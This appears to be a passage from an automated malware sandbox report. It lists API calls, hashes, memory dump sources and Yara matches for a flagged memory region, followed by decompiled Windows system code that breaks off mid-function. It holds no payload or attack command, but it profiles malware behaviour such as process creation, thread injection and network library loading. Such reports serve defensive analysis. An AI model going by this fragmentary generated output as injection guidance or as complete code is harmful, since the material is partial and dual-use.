                        • Opcode ID: 81225e3559f365c7cfedea90df258794b30b6548270b57b72291ba2a2845f45a
                        • Instruction ID: c90b7991cc41352d619f3ffd2c29d11ca29fe6dd7a6a618e0b989fc8687cbbe2
                        • Opcode Fuzzy Hash: 81225e3559f365c7cfedea90df258794b30b6548270b57b72291ba2a2845f45a
                        • Instruction Fuzzy Hash: 7990027220100502D50065995408657000997E0381F51D055A9024565EC7E5C8A17171
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: fae82e52c6e3716478adbd4a4dda3b69889249ccf61a48de7611e1c7c46fad61
                        • Instruction ID: df22021c3a0edd9c9965c2c8dba9e1194373134d2f095a29144c0b341c50ac97
                        • Opcode Fuzzy Hash: fae82e52c6e3716478adbd4a4dda3b69889249ccf61a48de7611e1c7c46fad61
                        • Instruction Fuzzy Hash: 239002A220200103450571594414627400E97E0281B51C065E50145A0DC6A5C8A17165
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: c93924f6e0fecfb5a56eeacba557b528d4dfbdd4a337ae4bf02ed0b863dc9f71
                        • Instruction ID: 8da9764e529e19d49cbb5bd32886c1bda0dfd74e8fcd88d710e46b9cb12e92d9
                        • Opcode Fuzzy Hash: c93924f6e0fecfb5a56eeacba557b528d4dfbdd4a337ae4bf02ed0b863dc9f71
                        • Instruction Fuzzy Hash: E5900477311001030505F55D0704517004FD7D53D1351C075F5015570CD7F1CC717171
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • Sleep.KERNELBASE(000007D0), ref: 00169128
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.514736730.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: Sleep
                        • String ID: net.dll$wininet.dll
                        • API String ID: 3472027048-1269752229
                        • Opcode ID: 25d21b78aca220dfb326c4a1fa34404d4f341e476188e7c6674460533353cf02
                        • Instruction ID: d3f337d1d6d25e6475f81c43a20071f0674a6539d994a3dc94926c571e98f318
                        • Opcode Fuzzy Hash: 25d21b78aca220dfb326c4a1fa34404d4f341e476188e7c6674460533353cf02
                        • Instruction Fuzzy Hash: 0F3161B2500645ABC714DF64CC85FA7B7B8BB48B00F10851DFA2A9B245D734B560CBA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • Sleep.KERNELBASE(000007D0), ref: 00169128
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.514736730.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: Sleep
                        • String ID: net.dll$wininet.dll
                        • API String ID: 3472027048-1269752229
                        • Opcode ID: 999226e783e81447dc91e43c98cb7b840156d2220b39e615e7078b481f0575e1
                        • Instruction ID: 9db25b6fa59208136cf85b0e014d3198234934e0fe0c0a7ec877f0cc885d9b8d
                        • Opcode Fuzzy Hash: 999226e783e81447dc91e43c98cb7b840156d2220b39e615e7078b481f0575e1
                        • Instruction Fuzzy Hash: 5B21D2B1500341ABC714DF64CCC5FA7B7B8BF48704F10801DFA296B245D774A560CBA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00153AF8), ref: 0016A69D
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.514736730.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: FreeHeap
                        • String ID: .z`
                        • API String ID: 3298025750-1441809116
                        • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                        • Instruction ID: 94307d1a3e12db7a01f80992befad154427a72ba4d99723202b685f5a10e66e6
                        • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                        • Instruction Fuzzy Hash: C8E04FB12002186BD714DF59CC45EA777ACEF88750F118554FD0857241C630F910CAF1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0015836A
                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0015838B
                        Memory Dump Source
                        • Source File: 00000010.00000002.514736730.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: MessagePostThread
                        • String ID:
                        • API String ID: 1836367815-0
                        • Opcode ID: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
                        • Instruction ID: 97238ed14c5ef15d7361fad20148d6c5f258a40fc238f71cf5fdb79270b8d021
                        • Opcode Fuzzy Hash: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
                        • Instruction Fuzzy Hash: B0018F31A81228B7E720AA949C43FBE776C6B50F51F040118FF14BA1C2EBA5690A46E6
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0015AD62
                        Memory Dump Source
                        • Source File: 00000010.00000002.514736730.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: Load
                        • String ID:
                        • API String ID: 2234796835-0
                        • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                        • Instruction ID: 1abc3baf4d7486c8c84eebb62993a47c200864df41628a1b030e4b2eff80926e
                        • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                        • Instruction Fuzzy Hash: 2D015EB5E4020DABDF10EAE4DC42FADB3789F14309F004695AD189B241F731EB188B91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0016A734
                        Memory Dump Source
                        • Source File: 00000010.00000002.514736730.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: CreateInternalProcess
                        • String ID:
                        • API String ID: 2186235152-0
                        • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                        • Instruction ID: 2cf34cf7319552851a6aa75a45e75e82c23f2ed0e5b54d07e9117a0f519ed5a3
                        • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                        • Instruction Fuzzy Hash: 8901B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258FA0DA7241C630E851CBA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0015AD62
                        Memory Dump Source
                        • Source File: 00000010.00000002.514736730.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: Load
                        • String ID:
                        • API String ID: 2234796835-0
                        • Opcode ID: ac607fe8fadfd29998aeae0fc689f596357b97b0bf363d8ae678b1bbacd093b8
                        • Instruction ID: 7488eaae40ea9446f2576b23a754ac92ee0cd817b3e9e77a3b2d6767f4541d4c
                        • Opcode Fuzzy Hash: ac607fe8fadfd29998aeae0fc689f596357b97b0bf363d8ae678b1bbacd093b8
                        • Instruction Fuzzy Hash: 04F04F75A4010DABDB10EAD4D882FA9B378AB58309F008295ED1D9B641F671AA198B92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0015F050,?,?,00000000), ref: 001691EC
                        Memory Dump Source
                        • Source File: 00000010.00000002.514736730.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: CreateThread
                        • String ID:
                        • API String ID: 2422867632-0
                        • Opcode ID: 90f4d560c854e61cb04fff5511f6c9e31f58e75d6f69431325777fef47646c46
                        • Instruction ID: 40b2e39ab9d9adc57032ea50963d712c07638e7c31a88ac117d6a3b067557b30
                        • Opcode Fuzzy Hash: 90f4d560c854e61cb04fff5511f6c9e31f58e75d6f69431325777fef47646c46
                        • Instruction Fuzzy Hash: FAF02E762442413FD7315A685C47FEBBB689F52B20F140159F549DB1C3D795E4124390
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0015F050,?,?,00000000), ref: 001691EC
                        Memory Dump Source
                        • Source File: 00000010.00000002.514736730.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: CreateThread
                        • String ID:
                        • API String ID: 2422867632-0
                        • Opcode ID: d8d341beacf55d3aadfcb46bdd6eb0ebc06c290d7a953d7ae1546744555f20b2
                        • Instruction ID: 6907444322908499f2ef04c055193582a2c1de5ef30c9363ed8055951489a562
                        • Opcode Fuzzy Hash: d8d341beacf55d3aadfcb46bdd6eb0ebc06c290d7a953d7ae1546744555f20b2
                        • Instruction Fuzzy Hash: BDE06D773802043AE3206599AC02FA7B29C9B91B20F15002AFA0DEA2C1DA96F81142A4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0015F1D2,0015F1D2,?,00000000,?,?), ref: 0016A800
                        Memory Dump Source
                        • Source File: 00000010.00000002.514736730.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: LookupPrivilegeValue
                        • String ID:
                        • API String ID: 3899507212-0
                        • Opcode ID: 74acd7c4576bd7b0bd9d9c9a66c28c11f4d177fc94782425aa7f78d02a80c1ec
                        • Instruction ID: 9415d13d1f38f19bea907628d4afa9b4c79af4537a2a190766c8f272b20d9847
                        • Opcode Fuzzy Hash: 74acd7c4576bd7b0bd9d9c9a66c28c11f4d177fc94782425aa7f78d02a80c1ec
                        • Instruction Fuzzy Hash: E1F065B2600218ABDB14DF54CC41ED77769EF55310F258194FD096B242C631ED15CBF1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0015F1D2,0015F1D2,?,00000000,?,?), ref: 0016A800
                        Memory Dump Source
                        • Source File: 00000010.00000002.514736730.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: LookupPrivilegeValue
                        • String ID:
                        • API String ID: 3899507212-0
                        • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                        • Instruction ID: 7da5782a74079ec7268a45cbcbd457f581ff7f6d810eb5349a50f9e347b89baa
                        • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                        • Instruction Fuzzy Hash: B3E01AB12002186BDB10DF59CC85EEB37ADEF88650F118154BA0867241CA30E8108BF5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • SetErrorMode.KERNELBASE(00008003,?,00158D14,?), ref: 0015F6FB
                        Memory Dump Source
                        • Source File: 00000010.00000002.514736730.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                        Yara matches
                        Similarity
                        • API ID: ErrorMode
                        • String ID:
                        • API String ID: 2340568224-0
                        • Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                        • Instruction ID: 32f236d4ffc72d29b5bafc5b54320ee80c4b7516d24914b668b40f2394ff67e5
                        • Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                        • Instruction Fuzzy Hash: 4ED0A7717503083BE710FAA49C03F2632CC6B55B04F490074F958DB3C7EE55F4014165
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: ca9d171181a4db045759579588c6030022b8ed0d2803d2738235e88a8917ce56
                        • Instruction ID: 3f8ee1ffed9ddd32eda46062b3592ba0b9ee5e145f76bc0eba2bc868a73fb7c4
                        • Opcode Fuzzy Hash: ca9d171181a4db045759579588c6030022b8ed0d2803d2738235e88a8917ce56
                        • Instruction Fuzzy Hash: CAB09B729014C5C5DB15D77046087277904B7D0741F16C095D1030655A4778C491F6B5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Non-executed Functions

                        Strings
                        • The instruction at %p referenced memory at %p., xrefs: 02C4B432
                        • *** then kb to get the faulting stack, xrefs: 02C4B51C
                        • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 02C4B323
                        • *** enter .cxr %p for the context, xrefs: 02C4B50D
                        • an invalid address, %p, xrefs: 02C4B4CF
                        • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 02C4B314
                        • The critical section is owned by thread %p., xrefs: 02C4B3B9
                        • *** Inpage error in %ws:%s, xrefs: 02C4B418
                        • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 02C4B53F
                        • This failed because of error %Ix., xrefs: 02C4B446
                        • *** A stack buffer overrun occurred in %ws:%s, xrefs: 02C4B2F3
                        • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 02C4B476
                        • write to, xrefs: 02C4B4A6
                        • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 02C4B305
                        • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 02C4B38F
                        • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 02C4B47D
                        • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 02C4B484
                        • The instruction at %p tried to %s , xrefs: 02C4B4B6
                        • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 02C4B3D6
                        • The resource is owned shared by %d threads, xrefs: 02C4B37E
                        • <unknown>, xrefs: 02C4B27E, 02C4B2D1, 02C4B350, 02C4B399, 02C4B417, 02C4B48E
                        • The resource is owned exclusively by thread %p, xrefs: 02C4B374
                        • *** Resource timeout (%p) in %ws:%s, xrefs: 02C4B352
                        • a NULL pointer, xrefs: 02C4B4E0
                        • read from, xrefs: 02C4B4AD, 02C4B4B2
                        • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 02C4B2DC
                        • *** An Access Violation occurred in %ws:%s, xrefs: 02C4B48F
                        • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 02C4B39B
                        • Go determine why that thread has not released the critical section., xrefs: 02C4B3C5
                        • *** enter .exr %p for the exception record, xrefs: 02C4B4F1
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                        • API String ID: 0-108210295
                        • Opcode ID: 597cccd19b3636f94e7e4cdacaf57dd50a58fa1670f6e2ceb3450dc99f8c7c70
                        • Instruction ID: e812ad31e5a3f36b587b4f975132cedf9ba1d53f1bcec1181d530164464172fc
                        • Opcode Fuzzy Hash: 597cccd19b3636f94e7e4cdacaf57dd50a58fa1670f6e2ceb3450dc99f8c7c70
                        • Instruction Fuzzy Hash: CD813435E40210FFEB257A16CC45E7B3B26AF96BA9F804085F4096B162DF61C941EB72
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 44%
                        			E02C51C06() {
                        				signed int _t27;
                        				char* _t104;
                        				char* _t105;
                        				intOrPtr _t113;
                        				intOrPtr _t115;
                        				intOrPtr _t117;
                        				intOrPtr _t119;
                        				intOrPtr _t120;
                        
                        				_t105 = 0x2b748a4;
                        				_t104 = "HEAP: ";
                        				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                        					_push(_t104);
                        					E02B9B150();
                        				} else {
                        					E02B9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                        				}
                        				_push( *0x2c8589c);
                        				E02B9B150("Heap error detected at %p (heap handle %p)\n",  *0x2c858a0);
                        				_t27 =  *0x2c85898; // 0x0
                        				if(_t27 <= 0xf) {
                        					switch( *((intOrPtr*)(_t27 * 4 +  &M02C51E96))) {
                        						case 0:
                        							_t105 = "heap_failure_internal";
                        							goto L21;
                        						case 1:
                        							goto L21;
                        						case 2:
                        							goto L21;
                        						case 3:
                        							goto L21;
                        						case 4:
                        							goto L21;
                        						case 5:
                        							goto L21;
                        						case 6:
                        							goto L21;
                        						case 7:
                        							goto L21;
                        						case 8:
                        							goto L21;
                        						case 9:
                        							goto L21;
                        						case 0xa:
                        							goto L21;
                        						case 0xb:
                        							goto L21;
                        						case 0xc:
                        							goto L21;
                        						case 0xd:
                        							goto L21;
                        						case 0xe:
                        							goto L21;
                        						case 0xf:
                        							goto L21;
                        					}
                        				}
                        				L21:
                        				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                        					_push(_t104);
                        					E02B9B150();
                        				} else {
                        					E02B9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                        				}
                        				_push(_t105);
                        				E02B9B150("Error code: %d - %s\n",  *0x2c85898);
                        				_t113 =  *0x2c858a4; // 0x0
                        				if(_t113 != 0) {
                        					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                        						_push(_t104);
                        						E02B9B150();
                        					} else {
                        						E02B9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                        					}
                        					E02B9B150("Parameter1: %p\n",  *0x2c858a4);
                        				}
                        				_t115 =  *0x2c858a8; // 0x0
                        				if(_t115 != 0) {
                        					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                        						_push(_t104);
                        						E02B9B150();
                        					} else {
                        						E02B9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                        					}
                        					E02B9B150("Parameter2: %p\n",  *0x2c858a8);
                        				}
                        				_t117 =  *0x2c858ac; // 0x0
                        				if(_t117 != 0) {
                        					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                        						_push(_t104);
                        						E02B9B150();
                        					} else {
                        						E02B9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                        					}
                        					E02B9B150("Parameter3: %p\n",  *0x2c858ac);
                        				}
                        				_t119 =  *0x2c858b0; // 0x0
                        				if(_t119 != 0) {
                        					L41:
                        					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                        						_push(_t104);
                        						E02B9B150();
                        					} else {
                        						E02B9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                        					}
                        					_push( *0x2c858b4);
                        					E02B9B150("Last known valid blocks: before - %p, after - %p\n",  *0x2c858b0);
                        				} else {
                        					_t120 =  *0x2c858b4; // 0x0
                        					if(_t120 != 0) {
                        						goto L41;
                        					}
                        				}
                        				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                        					_push(_t104);
                        					E02B9B150();
                        				} else {
                        					E02B9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                        				}
                        				return E02B9B150("Stack trace available at %p\n", 0x2c858c0);
                        			}











                        0x02c51c10
                        0x02c51c16
                        0x02c51c1e
                        0x02c51c3d
                        0x02c51c3e
                        0x02c51c20
                        0x02c51c35
                        0x02c51c3a
                        0x02c51c44
                        0x02c51c55
                        0x02c51c5a
                        0x02c51c65
                        0x02c51c67
                        0x00000000
                        0x02c51c6e
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02c51c67
                        0x02c51cdc
                        0x02c51ce5
                        0x02c51d04
                        0x02c51d05
                        0x02c51ce7
                        0x02c51cfc
                        0x02c51d01
                        0x02c51d0b
                        0x02c51d17
                        0x02c51d1f
                        0x02c51d25
                        0x02c51d30
                        0x02c51d4f
                        0x02c51d50
                        0x02c51d32
                        0x02c51d47
                        0x02c51d4c
                        0x02c51d61
                        0x02c51d67
                        0x02c51d68
                        0x02c51d6e
                        0x02c51d79
                        0x02c51d98
                        0x02c51d99
                        0x02c51d7b
                        0x02c51d90
                        0x02c51d95
                        0x02c51daa
                        0x02c51db0
                        0x02c51db1
                        0x02c51db7
                        0x02c51dc2
                        0x02c51de1
                        0x02c51de2
                        0x02c51dc4
                        0x02c51dd9
                        0x02c51dde
                        0x02c51df3
                        0x02c51df9
                        0x02c51dfa
                        0x02c51e00
                        0x02c51e0a
                        0x02c51e13
                        0x02c51e32
                        0x02c51e33
                        0x02c51e15
                        0x02c51e2a
                        0x02c51e2f
                        0x02c51e39
                        0x02c51e4a
                        0x02c51e02
                        0x02c51e02
                        0x02c51e08
                        0x00000000
                        0x00000000
                        0x02c51e08
                        0x02c51e5b
                        0x02c51e7a
                        0x02c51e7b
                        0x02c51e5d
                        0x02c51e72
                        0x02c51e77
                        0x02c51e95

                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                        • API String ID: 0-2897834094
                        • Opcode ID: e65113ab5329c278742ebe7a0c026e09d2c95f5502b1bb41e87a9bafe76f3f4c
                        • Instruction ID: b52d22999296614610a9e801cfbc45205777b3b51acf90938d7c94d86c3ae5f9
                        • Opcode Fuzzy Hash: e65113ab5329c278742ebe7a0c026e09d2c95f5502b1bb41e87a9bafe76f3f4c
                        • Instruction Fuzzy Hash: C061B6379615B4DFD611AB45E88CF2573A5EB05A2470D84BAF80E5B321D7E5E8C0CE0E
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 96%
                        			E02BA3D34(signed int* __ecx) {
                        				signed int* _v8;
                        				char _v12;
                        				signed int* _v16;
                        				signed int* _v20;
                        				char _v24;
                        				signed int _v28;
                        				signed int _v32;
                        				char _v36;
                        				signed int _v40;
                        				signed int _v44;
                        				signed int* _v48;
                        				signed int* _v52;
                        				signed int _v56;
                        				signed int _v60;
                        				char _v68;
                        				signed int _t140;
                        				signed int _t161;
                        				signed int* _t236;
                        				signed int* _t242;
                        				signed int* _t243;
                        				signed int* _t244;
                        				signed int* _t245;
                        				signed int _t255;
                        				void* _t257;
                        				signed int _t260;
                        				void* _t262;
                        				signed int _t264;
                        				void* _t267;
                        				signed int _t275;
                        				signed int* _t276;
                        				short* _t277;
                        				signed int* _t278;
                        				signed int* _t279;
                        				signed int* _t280;
                        				short* _t281;
                        				signed int* _t282;
                        				short* _t283;
                        				signed int* _t284;
                        				void* _t285;
                        
                        				_v60 = _v60 | 0xffffffff;
                        				_t280 = 0;
                        				_t242 = __ecx;
                        				_v52 = __ecx;
                        				_v8 = 0;
                        				_v20 = 0;
                        				_v40 = 0;
                        				_v28 = 0;
                        				_v32 = 0;
                        				_v44 = 0;
                        				_v56 = 0;
                        				_t275 = 0;
                        				_v16 = 0;
                        				if(__ecx == 0) {
                        					_t280 = 0xc000000d;
                        					_t140 = 0;
                        					L50:
                        					 *_t242 =  *_t242 | 0x00000800;
                        					_t242[0x13] = _t140;
                        					_t242[0x16] = _v40;
                        					_t242[0x18] = _v28;
                        					_t242[0x14] = _v32;
                        					_t242[0x17] = _t275;
                        					_t242[0x15] = _v44;
                        					_t242[0x11] = _v56;
                        					_t242[0x12] = _v60;
                        					return _t280;
                        				}
                        				if(E02BA1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                        					_v56 = 1;
                        					if(_v8 != 0) {
                        						L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                        					}
                        					_v8 = _t280;
                        				}
                        				if(E02BA1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                        					_v60 =  *_v8;
                        					L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                        					_v8 = _t280;
                        				}
                        				if(E02BA1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                        					L16:
                        					if(E02BA1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                        						L28:
                        						if(E02BA1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                        							L46:
                        							_t275 = _v16;
                        							L47:
                        							_t161 = 0;
                        							L48:
                        							if(_v8 != 0) {
                        								L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                        							}
                        							_t140 = _v20;
                        							if(_t140 != 0) {
                        								if(_t275 != 0) {
                        									L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                        									_t275 = 0;
                        									_v28 = 0;
                        									_t140 = _v20;
                        								}
                        							}
                        							goto L50;
                        						}
                        						_t167 = _v12;
                        						_t255 = _v12 + 4;
                        						_v44 = _t255;
                        						if(_t255 == 0) {
                        							_t276 = _t280;
                        							_v32 = _t280;
                        						} else {
                        							_t276 = L02BB4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                        							_t167 = _v12;
                        							_v32 = _t276;
                        						}
                        						if(_t276 == 0) {
                        							_v44 = _t280;
                        							_t280 = 0xc0000017;
                        							goto L46;
                        						} else {
                        							E02BDF3E0(_t276, _v8, _t167);
                        							_v48 = _t276;
                        							_t277 = E02BE1370(_t276, 0x2b74e90);
